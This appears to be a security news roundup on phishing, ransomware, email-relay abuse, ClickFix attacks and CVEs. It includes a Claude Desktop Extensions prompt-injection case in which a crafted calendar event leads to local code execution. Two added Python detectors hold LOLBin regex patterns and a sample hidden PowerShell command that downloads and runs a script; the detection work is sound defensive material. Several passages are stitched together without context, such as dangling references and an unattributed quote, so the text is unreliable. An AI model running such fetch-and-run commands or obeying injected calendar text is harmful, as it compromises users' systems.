One recurring theme in this week's threat activity is that attackers are relying more on what has already proven effective. Many operations are built on the covert misuse of well-known tools, familiar workflows, and hidden exposures that are right in front of you, rather than on slick new exploits.

Another change concerns how access is obtained as opposed to how it is used. Initial entry points are becoming easier, while post-compromise activity is growing more purposeful, organized, and persistent. Staying embedded long enough to extract value matters more than causing disruption.

In one variation, victims are directed to use the Telegram mobile application to scan a QR code on fraudulent websites, which starts a genuine Telegram login attempt linked to attacker-controlled API credentials.

Telegram then prompts the victim's current session for in-app authorization. Alternatively, users can enter their phone number, country code, and verification code (if enabled) on a phony website, which forwards the information to Telegram's official authentication APIs. As before, Telegram sends an in-app authorization request once verification succeeds.

"This campaign uses attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure, in contrast to traditional phishing attacks that only use token replay or credential harvesting," CYFIRMA stated.

Claude Desktop Extensions operate unsandboxed with full system privileges, in contrast to conventional browser extensions, according to the browser security firm.

"Claude can thus independently link low-risk connectors (like Google Calendar) to high-risk local executors without the user's knowledge or approval. Even a harmless prompt ('take care of it') combined with a maliciously crafted calendar event can be used by a bad actor to initiate arbitrary local code execution that compromises the system as a whole." Anthropic has decided not to address the problem at this time.

Last month, Miggo Security revealed a similar Google Gemini prompt injection vulnerability.

Since its initial appearance in September 2025, Coinbase Cartel, a fledgling ransomware group, has claimed over 60 victims.

On February 8, 2026, the data leak website went down, but it came back up the following day listing over 15 very large multinational corporations. According to security researcher Jason Baker, "0APT is probably acting in this dishonest way to encourage extortion of ignorant victims, re-extortion of past victims from other groups, defrauding of potential affiliates, or to generate interest in a new RaaS group." According to Halcyon, the group's Windows and Linux ransomware samples have been found to be fully functional, despite indications that it may be lying about its number of victims.

It's important to note that ransomware organizations such as RansomedVC have deceived victims by listing fake attacks on their data leak websites.

Viewed in that context, 0APT's inflated claims are probably an effort to become more visible and popular among its peers.

According to Cofense, "the way these emails operate is that the threat actor registers for an account on a trustworthy website and enters random text into a field that will then be included in outgoing emails. The threat actor would then have to receive a genuine email that just so happens to contain the malicious text that the threat actor had produced. The threat actor can then reroute the email to the targeted victims after receiving it."

The CrashFix variant of the ClickFix attack has been observed delivering malicious payloads consistent with a known malware family called SystemBC.
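As an added illustration of the Cofense-described workflow (this is not code from Cofense or from the article), the following Python heuristic scores a notification email that passes DKIM yet shows signs of having been re-sent by a third party and of carrying attacker-supplied text in a free-text field. The sample message, every domain and address in it, and the two-finding threshold are constructed assumptions.

```python
import email
import email.utils
import re
from email import policy

# Constructed sample: a genuine notification from a legitimate service whose free-text
# field was filled by the attacker, received by the attacker, then re-sent to the victim.
SAMPLE_EMAIL = """\
Received: from mail.attacker-relay.invalid (mail.attacker-relay.invalid [203.0.113.5])
  by mx.victim.invalid; Tue, 10 Feb 2026 10:00:00 +0000
Authentication-Results: mx.victim.invalid; dkim=pass header.d=legit-service.invalid
Resent-From: forwarder@attacker-relay.invalid
From: Legit Service <no-reply@legit-service.invalid>
Content-Type: text/plain; charset=utf-8

Hello, a new message was left for you:
"URGENT: payment failed. Confirm at https://legit-service-billing.invalid/verify or call +1-555-0100"
"""
URL_HOST_RE = re.compile(r"https?://([^/\s\"'<>]+)", re.I)
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{7,}\d")

def analyze(raw: str):
    """Return (dkim_passed, findings) for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    _, addr = email.utils.parseaddr(str(msg.get("From", "")))
    sender_domain = addr.rpartition("@")[2].lower()
    dkim_passed = "dkim=pass" in str(msg.get("Authentication-Results", "")).lower()
    findings = []
    # Resent-* headers are the honest trace of a message being re-injected by a third party.
    if msg.get("Resent-From"):
        findings.append("resent_header")
    # Topmost Received is the hop that delivered to us; a direct notification would come
    # from the sender's own mail servers, not from an unrelated relay.
    received = msg.get_all("Received") or []
    if received and sender_domain not in str(received[0]).lower():
        findings.append("last_hop_not_sender_domain")
    part = msg.get_body(preferencelist=("plain",))
    body = part.get_content() if part else ""
    # Attacker-controlled fields are where off-domain URLs and phone lures end up.
    for host in URL_HOST_RE.findall(body):
        host = host.split(":")[0].lower()
        if host != sender_domain and not host.endswith("." + sender_domain):
            findings.append(f"foreign_url:{host}")
    if PHONE_RE.search(body):
        findings.append("phone_number_in_body")
    return dkim_passed, findings

def verdict(raw: str) -> str:
    # A DKIM pass proves the service sent it, not that its content is safe.
    return "suspicious" if len(analyze(raw)[1]) >= 2 else "clean"
```

The point the page makes is the one the last function encodes: authentication results vouch for the sending service, so content-level and path-level signals are what separate this abuse from a normal notification.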

The attack is notable because, unlike the CrashFix-style social engineering flow documented by Microsoft and Huntress, it did not use a malicious browser extension. "Instead, the victim was persuaded to execute a command via the Windows Run dialog (Win+R), as seen with traditional ClickFix," Binary Defense stated.

"Operators should change default passwords right away and set up rules requiring integrators or OT suppliers to enforce password changes going forward."
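The Run-dialog (Win+R) ClickFix flow described above is commonly hunted through process-creation command lines whose parent is the shell. The Python scorer below is an added example (not from Binary Defense, Microsoft or Huntress) that flags the usual combination of a LOLBin launcher, a remote fetch, evasion flags and the fake-CAPTCHA comment that ClickFix lures append; the feature set, threshold and sample command lines are constructed assumptions.

```python
import re

# One point per feature; a real ClickFix one-liner typically trips several at once.
FEATURES = {
    "lolbin_launcher": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|certutil|curl)\b", re.I),
    "remote_fetch": re.compile(
        r"https?://|\biwr\b|\birm\b|invoke-webrequest|downloadstring|net\.webclient", re.I),
    "evasion_flag": re.compile(
        r"-(w|windowstyle)\s+hidden|-nop\b|-(ep|executionpolicy)\s+bypass|-e(nc|ncodedcommand)?\s", re.I),
    "pipe_to_exec": re.compile(r"\|\s*iex\b|\biex\s*\(|invoke-expression", re.I),
    # ClickFix lures append fake CAPTCHA text as a comment so the victim sees
    # "I am not a robot" in the Run box rather than the command itself.
    "captcha_theater": re.compile(r"(#|\brem\b|::).*(not a robot|verification|captcha)", re.I),
}
THRESHOLD = 2  # assumed cut-off; tune against your own baseline of Run-dialog usage

def score_run_command(cmd: str):
    """Return (score, reasons) for one Run-dialog / process-creation command line."""
    reasons = [name for name, pat in FEATURES.items() if pat.search(cmd)]
    return len(reasons), reasons

def is_clickfix_like(cmd: str) -> bool:
    return score_run_command(cmd)[0] >= THRESHOLD

# Constructed sample telemetry: command lines as they would appear in a
# process-creation event whose parent is explorer.exe (i.e. typed into Win+R).
SAMPLES = [
    "notepad",
    r"\\fs01\share\report.docx",
    "cmd",
    'powershell -w hidden -ep bypass -c "iwr http://example.invalid/a.ps1 | iex" # I am not a robot',
    "mshta http://example.invalid/update.hta",
]

def triage(samples):
    """Return only the commands that cross the threshold, mapped to their reasons."""
    return {s: score_run_command(s)[1] for s in samples if is_clickfix_like(s)}

if __name__ == "__main__":
    for cmd, why in triage(SAMPLES).items():
        print(f"SUSPICIOUS ({', '.join(why)}): {cmd}")
```

A lone `cmd` or `notepad` scores below the threshold, which is what keeps a rule like this usable on hosts where the Run dialog is part of normal work.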

In a related move, Jonathan Ellison, the National Cyber Security Centre's (NCSC) director for national resilience, has called on the nation's critical infrastructure operators to take immediate action and prepare incident response plans or playbooks to handle such threats.

Ellison stated that "strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does," even though attacks remain possible.

Threat intelligence firm GreyNoise observed a sharp drop in global Telnet traffic on January 14, 2026, six days before the public release of a security advisory for CVE-2026-24061 on January 20. CVE-2026-24061 is a serious flaw in the GNU InetUtils telnet daemon that could lead to an authentication bypass.

According to GreyNoise's data, the hourly volume of Telnet sessions fell by 65% at 21:00 UTC on January 14 and then by 83% within two hours.

The Looker flaws, collectively tracked as CVE-2025-12743 and also known as LookOut (CVSS score: 6.5), were patched by Google in September 2025.

Users of self-hosted Looker instances are encouraged to update to the latest supported version, even though the fixes have already been applied to cloud instances.

A phony installer for the 7-Zip file archiver, downloaded from 7zip[.]com (the genuine domain is 7-zip[.]org), drops a proxy component that enrolls the compromised host as a residential proxy node.

This lets third parties route traffic through the victim's IP address while hiding their own origin. The installer is digitally signed with a now-revoked certificate that was originally issued to Jozeal Network Technology Co., Limited.